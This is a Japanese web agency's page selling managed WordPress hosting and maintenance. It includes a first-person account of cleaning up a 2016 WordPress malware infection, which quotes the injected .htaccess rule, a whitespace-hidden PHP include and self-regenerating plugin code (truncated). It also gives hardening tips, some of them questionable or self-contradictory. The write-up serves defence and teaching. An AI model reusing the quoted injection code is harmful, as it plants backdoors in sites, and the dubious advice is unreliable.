DtAサポート詳細

For use the server our managed

DtAサポートとはどういったサービスなのか?

  • 弊社で管理したサーバとWebサイトの更新や改善など弊社による作業をご利用いただくサービスです。
  • 年間最大3時間までのサイト更新などの作業時間を含みます。(作業時間が超過した場合は、都度見積をさせていただきます。作業内容は、OneDriveにて共有いたします。オプションにて月額による対応もあります。)
  • サイト更新作業に、webフォームの設置、アクセス解析タグ、WorPressなどのインストール、Webファイヤーウォールの設定、画像加工や差し替え、サイトの表記文章の書き換えなど、サイト及びdbのバックアップ作業やアップデート対応、サイトの表示スピード改善や最適化、検索サイトからの評価改善施策、Analytics及びSearchConsoleのアカウント開設、Googleマップの設置、facebookページのAPI掲載、YouTubeのエンベット(掲載)、Instagramの設置、が可能です。
  • メールパスワードやFTPパスワードは、弊社で設定します。年間、何度も変更可能です。(セキュリティの観点からも定期的な変更をお願いしています)
  • WordPressなどのインストールも上記サイト更新の作業時間内で可能です。(セキュリティに対応したインストールと運営できるように設定します。ご要望に応じて不正アタックなども定期的に監視可能です。セキュリティレベルはスパムアタック状況に応じて設定します。)
  • WordPressのアップデートにも対応いたします。(データベース及びサイトデータのバックアップの上、アップデートいたします)
  • サーバ初期費用に、サーバ移転費用を含みます。(WordPressなどの移転作業を含みます)
  • メールアカウント最大30。サイトデータ最大30ギガ。

管理サーバ及びオプション料金について

初期費用:3万円/初回のみ
年間使用料:3万円/1年間
※Web更新作業は難易度に影響して追加1時間2,500円〜8,000円です。(サイト内文言の書き換えは2,500円/h、システムやdbに影響する作業及び難易度の高いSEO対応は5,000円/h以上)
サブドメイン使用の場合、年間使用料1年分となります。他社からサブドメイン移転の場合は初期費用が必要です。

オプション:DtAサイト運営
DtAサイト運営A
(毎月3時間版):1万円/1ヶ月
DtAサイト運営B
(毎月6時間版):2万円/1ヶ月
※最短6ヶ月の契約となります。
※DtAサイト運営は、弊社以外のサーバをお使いの場合にも可能です。初期費用が必要になります。

SSL初期費用:5,000〜25,000円/初回のみ
SSL年間使用料:5,000〜125,000円/1年間
※SSLは使用するブランドやSSLのタイプにより料金が変動します。現在、約半数のアカウントでSSLをご利用いただいております。

(上記すべて税別)
初期費用・使用料・作業料は、銀行振り込みによる前払いになります。

お約束

  • 顧客の個人情報・サーバ管理のIDやPasswordは厳重に管理いたします。(必要でしたら機密保持契約を締結いたします。紙での契約締結は別途3,000円税別)
  • 上記情報は、顧客の請求に応じて開示いたします。

以下のお問い合わせの「新規のご相談」から
 ご相談:DtAサポート 

利用に際してお願い

  1. メール・FTP及びWordPressなどのログイン情報の管理を厳重にお願いいたします。
    https://dt-a.net/seo/seo-tips/wordpress-secure-setting/
    上記ページの5〜9。
  2. 定期的なパスワードの変更をお願いいたします。過去のパスワードの使い回しやローテーション使用はお止めください。不正アクセスの原因になります。FTP及びメールに関しましては弊社で対応いたします。
  3. 過大なデータのアップロードやダウンロード(1日100ギガを上限にしていますが、それ上回るデータのやりとり)。
  4. WordPressなどCMSをインストールした際には、弊社向けに管理権限を共有いただいております。使用用途は、不正アタックなどの調査の為です。
  5. サイトのAnalytics及びSearchConsoleのアカウント共有をお願いいたします。使用用途は、上記同様に不正アタックなどの調査の為です。

免責事項:お許しいただきたい

  • サイトデータ及びdbデータのバックアップのタイミングはご相談の上。つまり、ご指定のタイミング(深夜早朝及び土曜日曜など弊社営業時間外、弊社の作業スケジュール上対応困難なご指定タイミング)でのバックアップは別途お見積させてください。
  • サイトデータ及びdbデータを完璧に保存する保証はできません。(データ不足や損失による損害賠償には応じられません)
  • 不正アタックやマルウエアろウィルス感染を完璧にガードする保証はできません。弊社の持つ最大限のプロテクトは実行します。
  • 弊社が設置するWebフォームなど動作の確認を行った上でお渡しいたしますが、常時動作を保証するものではありません。アクセス状況などにより動作が不安定なタイミングがあることをご了承ください。
  • メール及びFTPやWordPressなどのアクセスIDやPasswordの管理を厳重にお願いいたします。不正アタックが確認されました場合、IPやPasswordを弊社にて変更させていただく場合がありますので、ご了承ください。
  • サーバ使用料及び関連する見積書・請求書・領収書はメール添付pdfでお送りします。紙出力→郵送が必要な場合は1件500円(税別)を申し受けます。
  • スパムメールフィルターは設定可能です。ただ、初期状態では精度が安定しておらずブラックリスト(問題のあるメールリスト)やホワイトリスト(安全なメールリスト)の随時追加登録により精度があがると考えておりますので、ご協力のほどお願いいたします。
  • サイトの表示スピードなど保証するものではありません。サイト表示スピード改善は、年間の作業時間内、もしくは作業時間を超過した場合は、別途お見積にて対応いたします。
  •  PhpMyAdminの設置は禁止させてください。dbデータは、弊社にて取得してお渡しや設定をいたします。
  • 顧客からのご相談やお問合せ、弊社からのご連絡はメールにてお願いいたします。直接の面談や電話によるお問合せには対応しておりません(別途お見積にて対応します。移動及び拘束時間に応じて見積させていただきます)。お打ち合わせは、事前に日時をお約束の上、Skype・LINEフォン・Chatworkでのやりとりになります。

禁止事項

  1. 大量のメールを送信する行為。
  2. 不正アクセスの元になりかねないFTPやログイン情報のID及びpasswordの安易な管理。
  3. DNSBL(DNS-based Blackhole List)やブラックリスト事業者等に登録されうるサービスの利用方法。
    例1:受信者が迷惑メールと判断する可能性が高いメールの送信
    例2:ウイルス感染したウェブサイトにおいて長期間対策が行われない場合
  4. 利用サービス上で利用者が運営するWebサイトやコンテンツ等を、迷惑メール、迷惑投稿、迷惑トラックバック等、一般的に迷惑行為とされる手法を用いて自ら宣伝する、または他者に宣伝を依頼する行為。
  5. 以下に例示されるものに類するウェブサイトやコンテンツの運営およびプログラムの運用。
    →不正に第三者の個人情報を取得する目的で公開されるサイトやコンテンツ
    例:フィッシングサイト
    →迷惑メールやコメントスパム等の迷惑行為によって宣伝が行われるサイトやコンテンツ
    →利用者に契約を締結する意思や登録する意思がないにもかかわらず、契約が締結されたり、登録がおこなわれるサイトやコンテンツ
    例1:入力項目等が一切無く、サイト上の何らかのボタンをクリックするだけで、
       IPアドレス等の情報を画面に表示させ、契約を行ったものとするコンテンツ (※1)
    例2:提供されるサービスに登録を行うと、利用者に意思確認が行われずに提携サイト等へ同時に登録が行われるコンテンツ (※2)
    →警視庁ウェブサイトや国民生活センターウェブサイト等にて、被害報告が寄せられる形態のサイトやコンテンツ (※3)
    例1:パチンコ/パチスロの“打ち子”“モニター”“サクラ”の募集/斡旋
    例2:SOHOワーク募集/斡旋
    例3:パチンコ・パチスロ・競馬予想情報提供サービス、ネットワークビジネスのノウハウ販売等所謂「自殺系サイト」と称されるサイトやコンテンツ
    →「さくらのレンタルサーバサービス」上でのCPUリソースを長時間専有する等によって、他のユーザのサービス利用を阻害するプログラム等の運用
  6. サーバやネットワークなどの設備に過剰な負荷をかけて、サービス品質の確保およびサービス提供に支障をきたす行為
    DoS攻撃
    オープンプロキシ(公開プロキシ)
    オープンメールリレー
    オープンで再帰可能なDNSサーバの設定
    その他、上記に類する行為
  7. 無限連鎖講の開設、勧誘、および連鎖販売取引を行う事を目的とするコンテンツ

※1:規約の表示や有料コンテンツであることの明示に関わらず、これに類する形態のものは全て運営を禁止します。
※2:規約への記述や事前の明示等の有無に関わらず、利用者への意思確認が行われないものには、全てこれに類するものと判断し、運営を禁止します。
※3:基本的にこれらの被害報告が発生するコンテンツに類するものは、運営実態の真偽に関わらず禁止いたします。
警視庁ウェブサイト: http://www.keishicho.metro.tokyo.jp/
国民生活センターウェブサイト: http://www.kokusen.go.jp/

以下のお問い合わせの「新規のご相談」から
 ご相談:DtAサポート 

DtAサポート

 

Webサイト(ホームページ)で、成果をあげるには何が必要なのか!

 

ドメイン / Domein 
サーバ / Server 
人材 / Manpower 

(私どもの確信!)
結論、効率的なWebサイトの管理+運用です!

 

DtAサポートは、サーバ+ドメインとセットで以下の内容について対応いたします。

1)WordPressのスパムアタックやマルウエア対策。(バックアップ+アップデート含みます)
2)最適コストでサイト運営(原稿やニュース追加・サイト改善)。
3)SEOほか、インターネットでの不明なや困ったに対してメール及び音声通話でサポートいたします。※音声通話の場合、事前に日時を決めて相互にPCを前にSkypeやHangoutほかで対応いたします。

 

基本:月間2時間のWeb作業料+サーバ使用料+ドメイン使用料

2時間でも意外と多くの作業ができます。作業内容は、onedriveにて共有いたします。

DtAサポート料金について

初期費用:3万円/初回のみ(サーバ移転作業を含みます)
月間サポート料:1万円(2時間のWeb作業を含みます)

※追加Web作業は難易度に応じて追加1時間2,500円〜8,000円です。(追加見積の例:サイト内文言の書き換えは2,500円/h、システムやdbに影響する作業及び難易度の高いSEO対応は5,000円/h以上)
1つのドメイン以外にサブドメイン使用の場合、追加となります。他社からサブドメイン移転の場合も初期費用が必要です。DNSの変更や管理など対応でます。作業時間の超過に関しましては、翌月に繰り越しも可能ですが、解約時に精算をお願いいたします。(1時間4,000円での計算となります)

(上記すべて税別)
初期費用・サポート料・追加作業料は、銀行振り込みによる前払いになります。

 

 

2時間で不足な場合はこちらのオプションチケットをご検討ください。

オプションチケット )
DtAオプションチケットA(追加3時間版):1万円/1ヶ月
DtAオプションチケットB(追加6時間版):2万円/1ヶ月

 

 

想定するWeb作業内容

以下の作業すべて時間計算で対応します。ですので、設定しました作業時間を超える場合、都度見積をさせていただく、もしくは、追加オプションの購入をお願いいたします。

  1. WordPressなどCMSのセキュリティを考慮したインストール及び定期的なアップデート。
  2. サイトの文言や画像の変更や追加・削除。
  3. 画像サイズや型式の最適化→サイトに掲載や差し替え。
  4. Webページの追加や削除・移動(URL変更にともなうhtaccess最適化対応)
  5. Webフォーム(お問合せフォーム)の設置。
  6. サイトデータ及びdb(データベース)のバックアップ(日程の調整の上で)。
  7. 検索サイトからの評価改善施策(基本版です。本格的なSEOはこちらです)。
  8. アクセス解析やSearchConsole(旧ウェブマスターツール)の設定
  9. FTP及びメールアカウント発行やパスワード変更対応。転送設定対応。
  10. お問合せフォームからの営業メール対応。(要約して定期的にお伝えします。問合せ先にも対応いたします)
  11. キーワード毎の検索ランクの定期的な取得→レポート提出。
  12. 初期費用にサイトの移転作業を含みます。(WordPress他対応)
  13. Googleマップ、facebookページ、Instagram、YouTube、の設置。

上記以外にも作業内容ご要望がございましたらお伝えください。作業時間が超える事が想定される場合、事前にご相談→お見積をさせていただきました上で作業をいたします。

 

※)特にWordPressのセキュリティ部分は、アクセス状況を随時監視することで最適な設定を実行いたします。つまり、無用にレベルの高い設定ではなくアクセス状況やスパムアタック状況によりセキュリティレベルを調整いたします。これは、セキュリティレベルをあげる事で運用時の扱いにくさも高くなるケースがあるからです。

 

DtAサポート料金について

初期費用:3万円/初回のみ(サーバ移転作業を含みます)
月間サポート料:1万円(最大2時間のWeb作業を含みます)

※追加Web作業は難易度に応じて追加1時間2,500円〜8,000円です。(概算:サイト内文言の書き換えは2,500円/h、システムやdbに影響する作業及び難易度の高いSEO対応は5,000円/h以上)
サブドメイン使用の場合、年間使用料1年分となります。他社からサブドメイン移転の場合は初期費用が必要です。

(上記すべて税別)
初期費用・サポート料・追加作業料は、銀行振り込みによる前払いになります。

 

 DtAサポート詳細 

 

以下のお問い合わせの「新規のご相談」から
 ご相談:DtAサポート 

ウィルス・マルウエア
問題 → 仮説 → 実施 → 検証

今回の問題(11月2016年)以前(6月2016年)に、マルウエアスが設置されてウィルスに感染したサイト1式を対策後に、サーバにアップしました。セキュリティソフトでウィルスは削除されたが、マルウエアは通常のスクリプトなので目視で削除(1,000ページ超え)。

WordPressのプラグインCrazy Boneでログイン状況をチェック、大量のアタックを発見、アクセス元のIPをプロテクト(all in one wp security)、ログインLock Downを設定、管理画面へのログインURLを変更。

 

弊社の体験した問題について、海外のサイトでは、
https://www.posizionamento-seo.com/search-engine-optimization/seo-organico/black-hat-seo/wordpress-seo-spam-backdoor/

https://www.scmagazine.com/seo-spam-injects-backdoor-code-on-wordpress-sites/article/571921/

こんな感じで、以下と同じ問題が発生して対処している。これらのウィルス(?)マルウエア(?)は、DDoS攻撃bruteforce攻撃だそうです。

これを見る限り、日本での検証例はなく、特異な症例だったのかも知れません。

 

( 顕在化した問題 )

  1. htaccessに、以下の記述が追加される。
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^.*$ index.php [L]
    </IfModule>

  2. index.php(第一階層にある)に以下の記述が追記される。この改行やスペース間もそのままにしています。
    ------
    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   error_reporting(0);ini_set("display_errors", 0);$localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));include_once($root_path."/d730d81e7o133a51c2bddc5c68874ce.zip"); ?>
    ----
    上記のスペースですが、エディタで開いて、右側で折り返す設定をしないと表示されないためかと思います。(私見)
  3. 第一階層に、xm1rpc.php というファイルが生成される。(似たファイル名のxmlrpc.phpというファイルはWordPressに存在している。1とlが違う。)
  4. 第一階層に、4bb0a250f62548654e50c3d29c4b6096.zip といったファイルが生成される。ファイル名は、すべて違う。
  5. プラグインのphpファイル全てに、以下のような記述が追記されます。
    -----
    <?php $localpath = getenv("SCRIPT_NAME"); $absolutepath = getenv("SCRIPT_FILENAME"); $root_path = substr($absolutepath, 0, strpos($absolutepath, $localpath)); $xml = $root_path . '/xm1rpc.php'; if (!file_exists($xml) || file_exists($xml) && (filesize($xml) < 3000) || file_exists($xml) && (time() - filemtime($xml) > 60 * 60 * 1)) { file_put_contents($xml, ___bdec('PD9waHAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC(まだ続きます)
    -----
  6. これらを継続して削除しても、しばらくすると生成や追記されている。

( 仮説 )

  1. 削除しても、上記記述を生成されるので、同じ記述がシステム内に存在しいてるのでは?
  2. もしくは、外部サイトにアクセスして、何かデータを取り込んでいるのでは?
  3. WordPressシステム内に、何か追記やファイルの追加がされているのでは?
  4. FTPやWPログインからアタックされ、ログインされているのでは?

 

( 実施 )

  1. WordPressでの発生だったので、wp-adminとwp-includesをまっさらな最新ファイルに置き換え。つまり、問題が想定されるのでファイル全てを削除の後、最新ファイルをアップロード。ポイントは、いったん削除の後、正規のシステムファイルをアップロードする。
  2. プラグインを全てftpで削除→新規にインストール。
  3. 問題の1.2.の中の記述を、wp-content内でgrepしました。同様に問題3.のファイル名もgrepしてみました。
  4. eval( )が何でも外部コマンドを実行するそうなので、wp-content内をgrepしてみた。
    参考にしたのは、
    https://dogmap.jp/2016/05/10/post-3258/
  5. wp-admin、wp-includesにも何か書き換えやファイルの追加が発生している事もかんがえられるので、オリジナルとの相違をチェックしました。(新規インストールしてますが安全の為と何か解決の手がかりが見つかるのでは?と考えて)
    使用したツールは、

    WinMerge
    http://www.geocities.co.jp/SiliconValley-SanJose/8165/winmerge.html
    こらです。フォルダ全体でチェックが可能でした。

  6. xm1rpc.phpファイルのパーミッションを000にする事で、これ以上ファイルが生成されないのでは?
  7. ログイン関係一式を新しく、しかも定期的にパスワード変更→チームで共有。

 

( 検証 )

  1. 上記実施3.4.は、見つからず。
  2. 実施5.は、以下のファイルの追加と書き換えがありました。
    ファイル追加:wp-includes/index.php
    ファイル書き換え:wp-includes/load.php
    対応)追加されたファイルは削除、書き換えられたファイルは、オリジナルに書き換え。これらファイル内に、<IfModule(htaccessに記載される内容) と xm1rpc(生成される不明なファイル) の記述がありました。
  3. 5.をさらに、themeにもおこないました。
    header.php
    が書き換えられていました。しかも、このファイルにはトロイの木馬ウィルス反応がありました。(PCで使用しているセキュリティソフトで)
    対応)オリジナルに書き換え。
  4. 実施6.は、パーミッションが、しばらくすると戻ってしまいました。

 

( さらに仮説 )

  1. FTPやWordPressログインから、ファイルの書き換えが実施されているのでは?
  2. 我々の未発見の問題ファイルがあり、何かのアクション(アクセスなど)でサーバ内にファイルの追加やファイル書き換えが実施されているのでは?
  3. WordPressログインは、キャッシュが残っている場合、IDとPasswordが不要でログインできてしまうので、この部分の対応も重要では?(これは、Crazy Boneでの不正と思われるアクセスログが現象しているのに問題が継続したので)
  4. uploadされている画像にもウィルスが記述されるている可能性がある。
    参考にしたサイト(他もあります)
    http://securityblog.sonydna.com/blog/security-measure/archives6/

 

( さらに実施 )

  1. FTPやWordPressログインパスワードの再設定、高度化。実際のユーザーさんには、管理方法の提案やウィルスソフトの使用とマシンスキャンなどの提案。
    こういった内容を提案しました。
  2. WordPres管理画面から、プラグインを含むファイルの追加や書き換えをできない設定にした。
    wp-config.php
    /** ファイル編集できなくする */
    define('DISALLOW_FILE_EDIT', true);
    define('DISALLOW_FILE_MODS', true );
    上記を追記。
  3. header.phpとfooter.phpのパーミッションを400に変更。
  4. アップロードされた画像ファイル(膨大にありました1万ファイルくらいはあったかな)の撮影情報の記述を消滅させる事で安全化できるらしいので、実行しました。
    撮影情報の削除には、ファイル型式の変更でいけるようでしたので、jpg→png(32bit)に変換して、これをさらにjpgにもどす。pngは一端jpg(高解像度)にして、そのjpg→pngに、gifも同様の作業。
    ※)このpngを32bitにしているのは、jpgの持つ写真のグラデーションを失わないため。
  5. 追加対応)wp-adminにbasic認証。
  6. ログインにLockDown以外にCaptchaを設定。

 

これで現状は、48時間(この文章を書いている時点)、怪しいファイルの生成や書き換えは発生していない。(追記:既に10日ほど問題なし)

しかし、こう書いてみると短く簡単に思われるかと思いますが、仮説→検証は、10回くらいしたような、つまり仮説→検証で、結果がでない、イコール仮説がだめ。この繰り返し。

そもそも上記の生成されるspamファイル名や内部の記述でネット検索しても、まず情報はなく、ここに至るまで、相当の時間がかかりました。(つまり、新しい事例なのか?)

「さらに仮説の3.」は、未実施。

 

( 現時点でざっくりとした感触 )

管理画面からのファイルとpluginの書き換えを禁止したら、敵さんからのアクションが停止しました。もしかしたら、Pluginを含む管理画面から編集可能なファイルにバックドアをしかける。その上で、wp-adminやwp-includesにファイルを追加したり追記して増殖を図り、そこから、外部のサイトへのアタックだったのでしょうか?(あくまで推察)

やはり、ログインIDとパスワードの管理ですね。簡単なパスワードを使い回したりするのはよくないです。仮に、定期的に変更していても、過去に使用していたパスワードですと、簡単にログインされてしまうのではとも感じました。

spamアタックでトライするログインIDが過去に設定していたIDになるケースが多かったので、どこかネットの闇市場で、IDと想定されるパスワードが出回ったのかもしれません。

BlackList設定して特定のIPからの管理画面へのアクセスを遮断すると、敵さんは、IPアドレスを毎回変更してきました。そこで、*(アスタリスク)にして、IPアドレスのレンジを広げることにしました。

つまり、192.168.100.100 (これは仮のIPで、イントラのIPですが)を、192.168.100.*  にすると、末尾のブロックの1から255までのレンジでプロテクトができます。

自分は、大丈夫、つまり、自分のPCやMacはウィルスに感染していないという過信がよくないようにも感じました。弊社のお客さんで、マシンが不調になったので、マイクロソフトにリモートでチェックをお願いしましたところ140を超えるウィルスが検出されたそうです。

その会社さん、セキュリティソフトは入れていた様ですが、こういった結果になってしまいました。

 

( セキュリティソフトに関する考え方 )

そもそも、ウィルスは、日々世界中で、開発されていて日々世界に流れ出しています。これを、セキュリティソフトの会社さんは、発見→解析→対策→配布、を継続して行っている訳です。

これは、高額なセキュリティソフトも、フリーのソフトも同じです。こう言うと、必ず言われるのが「だったら、フリーので充分じゃない」。でも、何が違うのかというとスピードなのです。

タイムラインで考えてみてください。新種のウィルスが発生した。即、その日のうちに対応(対応パッチを適応)した、というセキュリティソフトの会社と、一ヶ月後に対策対応したセキュリティ会社さん。当然、前者のスタイルでないと困ります。対策されるまでに、大量ウィルスが飛散され問題が顕在化する恐れがありますし、またウィルスによって、サイトの攻撃とかも想定されます。

なので、前者が有料で優秀なセキュリティソフトで、後者はフリーのセキュリティソフトだったりします。そこに価格の差があるのですが、両者とも、ウィルス検出率としては、90%(数字は自信がありません)とか公表したりします。ただ、これは一か月後の検出力なのです。

ウィルスやマルウエア発生、直後の検出率ではないのです。

つまり、ウィルスやマルウエアが流布した、即、対応してプロテクトされる、これが理想です。一か月後にプロテクトできても拡散している可能性が高い、ということなのです。

 

これらのトラブル経験からサイトの管理運営を最適化したサービス「DtAサポート」を始めました。
 DtAサポート 

 

WordPressのセキュリティを
意識した設定flowとか

これらのトラブル経験からサイトの管理運営を最適化したサービス「DtAサポート」を始めました。
 DtAサポート 

 

( 現状、メモに近い書きかけのコンテンツです )

  1. インストール時に、dbのprefixを設定する。これは昨今、サーバ会社さんの方で自動で割り振られたりしているので比較的スタンダードになっている。まずは安心。もし、そうでない場合は、意図的にprefixを追記する必要がある。
  2. インストールするディレクトリ名は、一時期、/wp/以外にすると良いといわれましたが、結局、サイトができた際に、ソースをみるとわかってしまうので、ディレクトリ名は、それほど注意する必要はない。
  3. インストールで一番のポイントは、管理者IDとしてのadminである。つまり、デフォルト(初期状態)だと、管理者IDはadminになってしまう。これが、問題で、ハッカー達は、まずはIDはadminでアタックしてくるので、管理IDはadminにしない事が必須である。
  4. あと、admin+御社名やadmin+ドメイン名とかも、ハッカーはトライしてきますので、それ以外にしてください。弊社の例ですと、admindtaとかadmindt-aというのは良くないという意味です。
  5. パスワードはある程度の長さで、推察されにくいパスワードにしてください。御社名や電話番号、社長の名前、御社サービス名など、サイトに掲載されるワードはさけてください。意味不明なパスワードが良い、とされていますが、これは間違いではないのですが、ポイントはハッカーにとって意味不明である事が重要です。ハッキングでDictionary Attackという辞書に掲載されている単語を中心にアタックする手法がとられたりします。
  6. IDやパスワードで問題になるのは、保存方法で、平文(見たまま判読できるテキスト)での保存は避けた方がよいです。意外なほどに、お使いのマシン(PC)から情報が漏洩しているケースがあります。IDとパスワードが書かれたテキストデータでしたら、開封パスワードをかけて圧縮する、とか、最低限エクセルなどのデータで開封パスワードを設定してください。チーム間で共有する場合、メールで共有する場合は、パスワードを設定したファイルにしてください。メール文中に直接記載するのはオススメしません。そして、そのファイルにパスワードを設定してください。
  7. この平文というのが良く理解されないようなので説明しますと、例えば、admindtaというIDを保存する場合、このままでは、保存したマシンがハッキングされれば、即、IDはadmindtaとわかってしまいます。それを、保存時には、管理自社、としておきます。つまり、使用する際に、管理→admin、自社→dtaと変換する訳です。
  8. こういったルールを複数組み合わせたり、セキュリティ管理の起点となる日をチームで共有する事で、ある日付に一定の数字追加するなどして、より簡単には判読できない方法をとる事も可能です。
    例えば、セキュリティパスワード変更をチームで7月1日に共有した場合、0701に、一定の数字、たとえば、1234と決めておけば、セキュリティパスワードのメールの日付(0701)に1234を加算する、1935、これをパスワードの末尾や先頭に追加するだけでも、平文での保存よりセキュリティレベルがあがります。
  9. 上記2つを合算しますと、パスワードを、管理自社防衛(セキュリティを防衛としました)、として保存していた場合、実際のパスワードは、admindta1935となります。なので、平文で保存しない、といのはこういう事です。ここに大文字や特殊文字(@、(、)、’、_、)を追加して、@dmin’(DtA)_1935、とでもするとセキュリティレベルは向上します。※)これは一例で実際にはもっと難解なパスワードを生成しているケースもあります。
  10. 初期設定時に、ユーザーIDがサイトに表示されない設定も重要です。方法は、ユーザー→ニックネームを編集→ブログ上の表示名からニックネームの方を選択。これで大丈夫です。デフォルト(初期状態)では、ユーザーIDがそのままブログ上の表示名として使用されるので、管理画面へのアタックの際に、アカウントIDとして使用されてしまいます。
  11. 弊社では、All in One WP Security & Firewall を活用しています。←は英語のページですが検索すれば使い方を解説したサイトは多数あります。
  12. このプラグインの、すべての設定を実行する必要はないと考えておりまして、弊社が設定しいてるのは、管理IDをadminにしてしまった場合に、このpluginが有効になります。User Accountsから、admin以外に変更が可能です。もしくは、他に管理アカウントを作成して、ログインし直して(一端ログアウトの後、新しい管理アカウントでログインする)、adminアカウントを削除する。
  13. SettingsのWP Version infoにチェックをいれるとソース部分で表示されるwordpressのバージョン表記を削除できます。どんなメリットがあるかといいますと、ハッカーはwordpressのバージョンに対応した方法でアタックをしてきます。なので、まず、こちらのバージョンをクローズにする事で、アタック方法を(少しですが)制限できるのです。
  14. User Loginでは、Login Lockdownを設定します。初期状態では、5分間に3回ログインをミスすると60分間アクセスできなくなる、という設定です。ここを120分とかに設定しています。このUser Loginの中のNotify By Emailにメールアドレスを記載して、チェックをいれておくと、不正アクセスがあった場合、メールでお知らせがとどきます。
    ログインしてLogin Lockdownを設定している場合、複数回のミスでログインできなくなった場合、設定した時間おいて(経過して)再トライする、もしくは、違うIPアドレスからアクセスする方法が必要なります。身近な方法ですと、スマホのテザリング、もしくはお使いのルーターを再起動する事で可能です。
    管理画面から、LockOutさせられたIPアドレスを確認・解除する方法もあります。UserLogin→LoginLockDownタブのしたの方、Currently Locked Out IP Adrdress Rangeの中にLocked IP Addressのリンクがありますので、そのリンク先でロックされたIPアドレスを確認・解除する事ができます。これは、チームで作業していて誰かがロックされてしまった場合にロック解除するようなケースで使用します。
  15. Firewallもチェックをいれていますし使用しないにしても、コメント機能やpingbackは制御にチェックをいれます。
  16. Brute Forceは管理画面への不正アクセスをプロテクトする機能です。wordpressの場合、ログイン画面へのアクセスURLが容易に推察できてしまうので、ログインURLを変更する機能です。
    一部のthemeが原因なのか、この機能が使用できないケースもあります。つまり、設定をしても反映されず、単に、404エラーになったりします。この場合、ログインができなくなりますので、このページの一番下に書かれた方法(22)でリカバリーする必要があります。
  17. ログイン画面に、簡単な計算式を追加して自動でBrute Forceアタックしてくるスパムアクセスに対してハードルをあげる事も可能です。Brute Force→Login Captchaです。パスワードを忘れた際の「パスワードをお忘れですか?」にもこのキャプチャを設定できます。
  18. 他にも、htaccessやwp-configファイルのパーミッションもこのツールで設定しています。
  19. さらに、不正なアタックがどれくらいあるのか、上記All in One WP Security & Firewall の管理画面にアクセスしてログインエラーをしたログをみる事ができます。
    User Login→Failed login Recordsに表示されます。
    この場合、アクセス元のIPの末尾が、*(アスタリスク)になった表記もありますが、これは、このまま、BlackListManagerに登録すれば、より広範囲の近いIPもプロテクトされます。もし、広範囲なIPのプロテクトが気になる場合は、アクセス元IPの*(アスタリスク)を含まないタイプを登録する事で解決できます。
  20. ログインユーザーのチェックも重要です。User Login→Account Activity Logsで、ログイン履歴の確認ができます。ログインの日付、IPアドレスをチェックしてください。普段アクセスしないIPからのアクセスは要注意です。
  21. 不正アクセスが確認できた場合、そのアクセス元のIPアドレスを、All in One WP Security & FirewallのBlacklist Managerに設定することもお忘れなく。
    ただ、スパムアクセスをしてくるようなところですので、IPアドレスも自在に変更しているとは思いますが、一応、弊社では、スパムアタック元のIPアドレスは、このBlacklist Managerに登録する事にしています。
    この設定をしますと、wordpressディレクトリのhtaccessに追記されますので、ある時、htaccessを確認して、不明な記述がある、とならないようにしてください。
  22. さて、ここで上記方法でセッティングをしたとして、ログインができなくなるケースがありました。つまりログインURLを変更したのですが、そのURLにアクセスしても、404エラーとなってしまったケースです。
    この場合、FTPでサーバにアクセスしまして、pluginディレクトリの中のall-in-one-wp-security-and-firewall このディレクトリをいったんダウンロードした上で削除すると、初期状態のログインURLからログインできます。パーミッションを000にする事でも同じです。
  23. wp-adminディレクトリにbasic認証をかけると良いという情報がネット上にありますが、これは間違っていまして、設定しますとサイト閲覧時にbasic認証のIDとpasswordが要求されます。
  24. 管理画面から、プラグインやシステムファイルの編集をできなくする事も有効です。wp-config.phpの末尾に、
    define('DISALLOW_FILE_EDIT', true);
    define('DISALLOW_FILE_MODS', true );
    といった記述を追加します。問題点としては、アップデートの際には上記の記述をいったん削除した上で実行する必要があります。

 

これらのトラブル経験からサイトの管理運営を最適化したサービス「DtAサポート」を始めました。
 DtAサポート 

 

WordPressでの
不正ログイン対策について

検索サイトからの評価が高まり、サイトへのアクセスが拡大してくると、多くのケースで管理画面への不正なアクセス(アタック)も拡大する。特に、お使いのCMSがWordPressの場合、特に多くの不正アクセスが発生する。

これは、インターネットで使用されているCMSの多く(50%超え)がWordPressである事にも起因している。つまり、ハッキングする不正アクセスする側からすれば、WordPress攻略方法を確立すれば効率がよいという事になる。

 

スクリーンショット 2016-06-30 17.00.46
不正アクセスログリスト(画像をクリックすると拡大表示されます)

左の画像(画像をクリックすると拡大表示されます)は、管理画面への不正アクセスリストの一部である。

ご覧いただいておわかりの様にadminというユーザー名でのアクセスが多い。これは、wordPressインストール時に何もしなければadminというユーザー名で管理者アカウントが生成されるからである。

では、具体的にどのように、こういった不正アクセスのログ(記録)を取得するのか?

弊社では、Crazy Boneというプラグインを活用している。これは、管理画面へのアクセスログを取得する。(※現在ではCrazy Boneは使用していない。理由:アプリのアップデートが2年ほどされていない)

使い方は、至ってシンプルで、管理画面左メニューの「ユーザー」→「ログイン履歴」で表示される。そして、プルダウンメニューで、「全て」と「login_error」チョイスして「フィルターを適用」をクリックすると、上記のリストが表示される。

表示されない場合は、不正アクセスがなかったという事で、一安心である。ただ、プラグインを設定してすぐの場合、ログが取得できていないのである程度の期間の後、及び継続的にログを確認するのが望ましい。

all in one wp securityというプラグインの場合、ログインエラーの状況だけではなく、さらにログインしたユーザーも確認できるので、実際に不正アクセスが実行されてしまった事も確認できる。

 

こういった不正アクセス対策として、
何を実行すべきなのかをリストにしてみた。

  1. 管理画面に不正アクセスをさせない。
    → ログインURLのカスタマイズ。※以下に設定のフローを記載。
  2. 不正アクセスがあっても簡単にログインをさせない。
    → Login Lock Downと呼んでいる「一定回数ログインに失敗した場合、アクセス元のIPアドレスを一定時間プロテクトする」機能を設定にする。※以下に設定のフローを記載。
  3. 不正アクセスがあるが、まだ、スパマーはログインできていない。
